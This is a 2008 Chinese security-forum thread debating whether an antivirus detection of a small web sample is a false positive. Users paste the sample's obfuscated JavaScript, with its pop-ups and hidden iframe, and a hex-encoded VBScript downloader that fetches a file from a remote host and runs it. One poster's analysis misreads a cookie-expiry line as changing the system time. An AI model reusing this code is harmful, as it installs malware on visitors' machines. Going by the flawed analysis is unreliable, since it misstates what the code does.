红伞又误报？

dd2006

我忘了是那个网站了

上传多引擎只有红伞报，样本在附件

VirSCAN.org Scanned Report :
Scanned time   : 2008/01/02 18:17:06 (CST)
Scanner results: 3%的杀软(1/36)报告发现病毒
File Name      : popn_3527_2[1].rar
File Size      : 1348 byte
File Type      : RAR archive data, v1d, os
MD5            : 9ea03ef7ad2ae9dab7be00ce1c999626
SHA1           : a2cf28effd39de4bbd1afed4e48757fa3073e1fa
Online report  : http://virscan.org/report/f6642c702d7b6c68a8b837e0d764ebda.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.0.0.126       2008.01.01        2008-01-01  3.43   -
安博士V3       2007.12.31.00   2007.12.31        2007-12-31  1.90   -
AntiVir        7.6.0.46        7.0.1.184         2008-01-02  5.67   JS/Dldr.Boran.1
Arcavir        1.0.4           200801011121      2008-01-01  2.89   -
AVAST          1.0.8           080101-0          2008-01-01  4.87   -
AVG            7.5.49.442      269.17.13/1206    2008-01-01  6.05   -
BitDefender    7.60825.963031  7.16654           2008-01-02  8.52   -
CA (VET)       9.0.0.143       31.3.5424         2008-01-02  15.20  -
ClamAV         0.91.2          5338              2008-01-02  0.01   -
Comodo         2.11            2.0.0.390         2007-12-31  1.84   -
CP Secure      1.1.0.655       2008.01.02        2008-01-02  11.40  -
Dr.WEB         4.44.0.9170     2007.12.31        2007-12-31  6.56   -
ewido          4.0.0.2         2008.01.01        2008-01-01  2.24   -
F-PROT         4.4.1.52        20080101          2008-01-01  1.76   -
F-SECURE       5.51.6100       2007.12.28.04     2007-12-28  0.04   -
飞塔           2.81-3.11       8.449             2007-12-03  0.45   -
ViRobot        20071231        2007.12.31        2007-12-31  0.65   -
IKARUS         T3.1.01.15      2008.01.02.70086  2008-01-02  1.63   -
江民杀毒       10.00.650       2007.12.31        2007-12-31  1.45   -
卡巴斯基       5.5.10          2008.01.02        2008-01-02  6.69   -
金山毒霸       2007.6.20.249   2008.1.2          2008-01-02  1.08   -
迈克菲         5.2.00          5196              2007-12-31  3.23   -
MKS_VIR        2.01            2008.01.01        2008-01-01  5.39   -
NOD32          2.70.10         2759              2008-01-01  0.00   -
NORMAN         5.91.08         5.90              2007-12-30  8.34   -
熊猫卫士       9.04.03.0001    2008.01.01        2008-01-01  3.81   -
趋势           8.500-1001      4.926.11          2008-01-01  0.04   -
Prevx          V2              20080102          2008-01-02  40.79  -
QuickHeal      9.00            2007.12.31        2007-12-31  2.85   -
瑞星           19.0            20.25.20.00       2008-01-02  1.16   -
SOPHOS         2.49.1          4.21              2008-01-02  17.28  -
赛门铁克       1.3.0.24        20080101.003      2008-01-01  0.48   -
nProtect       2007-12-31.00   1108089           2007-12-31  5.11   -
The Hacker     6.2.9           v00176            2007-12-31  2.07   -
VBA32          3.12.2.5        20080101.2040     2008-01-01  3.29   -
VirusBuster    4.3.19:9        9.118.12/11.0     2008-01-02  3.78   -

[ 本帖最后由 jimmyleo 于 2008-1-2 22:22 编辑 ]

七少

就是报的个脚本吧 没什么事吧

kingnoa

很正常,垃圾就是垃圾

Graybird

已上报antivir~

dd2006

原帖由 Graybird 于 2008-1-2 18:28 发表
已上报antivir~

我也已经报过了，算是支持红伞吧

闪电战

自己是垃圾，所以看什么都是垃圾

y37007

原帖由 kingnoa 于 2008-1-2 18:24 发表
很正常,垃圾就是垃圾

     找骂的，
周版锁老，这个人捣乱

闪电战

var O9=Array(0,120000);var O10=Array(300000,420000,600000);var O11="",O12="",O13=0,O14=1,O15=0,O16=0,O17=0,O18=0,O19=0;function O0(O20,O21,O22){
O23=new Date();O23.setTime(O23.getTime()+O22*3600000);document.cookie=O20+"="+O21+";expires="+O23.toGMTString();}
function O1(O20){var O24=O20+"=";var O25="";if (document.cookie.length>0){O26=document.cookie.indexOf(O24);if(O26!=-1){O26+=O24.length;O27=document.cookie.indexOf(";",O26);if(O27==-1){O27=document.cookie.length;}O25=unescape(document.cookie.substring(O26,O27));}}return O25;}function O2(){if(!O14){O28=window.open(O12,"","width="+window.screen.availWidth+",height="+window.screen.availHeight+",top=0,left=0, toolbar=yes, menubar=yes, scrollbars=yes, resizable=yes,location=yes, status=yes");if(O28){O14=1;O13++;O29=new Date().getTime();O0(O11,O13+","+O29,24);}else{O16=1;O3();}}}function O3(){if(!O14 && !O15){if(window.Event)document.captureEvents(event.click);document.onclick=O4;O15=1;}}function O4(){O2();}function O5(O30,O31,O36){O33=O1(O30).split(",");if(O33.length>1){O32=O33[0];O35=O33[1];}else{O32=0;O35=0;}if(O32<O36 && O14){O29=new Date().getTime();if(O29-O35>O9[O32]){O11=O30;O12=O31;O13=O32;O14=0;if(!O16){O2();}}}}function O6(adtn){O19=adtn;O7();}function O7(){O34=O1("c19").split(",");if(O34.length>1){O17=O34[0];O18=O34[1];}else{O17=0;O18=new Date().getTime();O0("c19",O17+","+O18,24);}if(O17<O19){O8();}}function O8(){O29=new Date().getTime();if(O29-O18>O10[O17] && O14){O11="c19";O12="http://www.3527.com/t?n="+O17;O13=O17;O14=0;if(!O16){O2();}O7();}else{setTimeout(O8,1000);}}O6(3);function pop2_3527_2(O30,O31){O31=O31.replace
("www.131377.com","www.3527.com");O5(O30,O31,2);}function pop1_3527_2(O30,O31){O31=O31.replace
("www.131377.com","www.3527.com");O5(O30,O31,1);}document.writeln("<OBJECT id=stb height=0 width=0 classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A><PARAM NAME=\"ActivateApplets\" VALUE=\"-1\"><PARAM NAME=\"ActivateActiveXControls\" VALUE=\"-1\"><PARAM NAME=\"ActivateDTCs\" VALUE=\"-1\"><PARAM NAME=\"ShowDetails\" VALUE=\"0\"><PARAM NAME=\"ShowBorders\" VALUE=\"0\"><PARAM NAME=\"Appearance\" VALUE=\"1\"><PARAM NAME=\"Scrollbars\" VALUE=\"-1\"><PARAM NAME=\"ScrollbarAppearance\" VALUE=\"1\"><PARAM NAME=\"SourceCodePreservation\" VALUE=\"-1\"><PARAM NAME=\"AbsoluteDropMode\" VALUE=\"0\"><PARAM NAME=\"SnapToGrid\" VALUE=\"0\"><PARAM NAME=\"SnapToGridX\" VALUE=\"50\"><PARAM NAME=\"SnapToGridY\" VALUE=\"50\"><PARAM NAME=\"UseDivOnCarriageReturn\" VALUE=\"0\"></OBJECT>");
function stbs(){
//dm=document.domain;
A1=O1("h");A2=new Date().getTime();popurl="http://www.3527.com/t?n=3";if(A2-A1>120000){O0('h',A2,24);stb.DOM.Script.window.open(popurl,'_blank',"width="+window.screen.availWidth+",height="+window.screen.availHeight+",top=0,left=0, toolbar=yes, menubar=yes, scrollbars=yes, resizable=yes,location=yes, status=yes");
}}
window.attachEvent("onbeforeunload",stbs);
if(!O1("banner")){
        O0("banner","1",24);
        window.status="";
        document.write('<ifr'+'ame src=http://a1.65862.com/count.html width=0 height=0></ifr'+'ame>');
}

闪电战

不懂脚本语言，觉得最后一段代码很奇怪

will

这显然是病毒好不好！！！
-------------------------------------------------------------------
小菜附上一个简单的分析：
先不说别的，这两行就够可疑：

1. O23=new Date();
   
2. O23.setTime(O23.getTime()+O22*3600000);

复制代码

稍微懂一点编程的都知道这个函数是用来设置系统时间的  （估计是用来挂掉卡巴  想当然猜的）

再说正题，最后这里：

1. document.write('<ifr'+'ame src=http://a1.65862.com/count.html width=0 height=0></ifr'+'ame>');

复制代码

也就是"<iframe src=http://a1.65862.com/count.html width=0 height=0></iframe>"

而这个count.html里面就一句话<script language=vbscript src=count.gif></script>
就是说用VBSCRIPT来执行count.gif里的内容，  而这里的count.gif指的就是h**p://a1.65862.com/count.gif

打开count.gif可以看到：

1. Y1="4F6E206572726F7220726573756D65204E6578740D0A58313D22687474703A2F2F61642E36353836322E636F6D2F7265616C2E676966220D0A5365742058323D646F63756D656E742E637265617465456C656D656E7428226F626A22262265637422290D0A58322E7365744174747269627574652022636C6173736964222C22636C7369643A42222622443922262236433535362D363541332D313144302D393833412D303043303446433239453336220D0A536574205831373D58322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831383D5831372E526567526561642822484B4C4D5C534F4654574152455C6164785C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C7265616C5C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C726973696E675C5261765C22290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C526973696E675C4B614B61546F6F6C4261725C6E616D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C333630736166655C436F6F705C507265506172746E657222290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C4B696E67736F66745C416E746956697275735C496E7374616C6C54696D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C4B6173706572736B794C61625C415650365C656E7669726F6E6D656E745C50726F647563744E616D6522290D0A4966205831383D2222205468656E0D0A58333D224D2226226963722226226F736F66742E582226224D4C48222622545450220D0A5365742058343D58322E4372656174654F626A6563742858332C2222290D0A58353D2241646F220D0A58363D2264622E220D0A58373D22537472220D0A58383D2265616D220D0A58393D58352658362658372658380D0A5831303D58390D0A736574205831313D58322E6372656174656F626A656374285831302C2222290D0A5831312E747970653D310D0A5831323D22474554220D0A58342E4F70656E205831322C58312C46616C73650D0A58342E53656E640D0A5831333D225822264353747228496E742828393939392D313030302B31292A526E642B31303030292926222E636F6D220D0A736574205831343D58322E6372656174656F626A6563742822532226226372692226227074696E672E46222622696C6553792226227374656D4F626A656374222C2222290D0A736574205831353D5831342E4765745370656369616C466F6C6465722832290D0A5831333D5831342E4275696C6450617468285831352C583133290D0A5831312E6F70656E0D0A5831312E77726974652058342E726573706F6E7365426F64790D0A5831312E73617665746F66696C65205831332C320D0A5831312E636C6F73650D0A53657420583136203D2058322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831362E72756E28583133290D0A456E64204966":Y2="EXECUTE """"":Y3="&CHR(&H":Y4=")":DO WHILE LEN(Y1)>1:Y2=Y2&Y3&LEFT(Y1,2)&Y4:Y1=MID(Y1,3)
   
2. LOOP:EXECUTE Y2

复制代码

到这里小菜不会解密了……   有待高手解决

[ 本帖最后由 yimike 于 2008-1-2 20:31 编辑 ]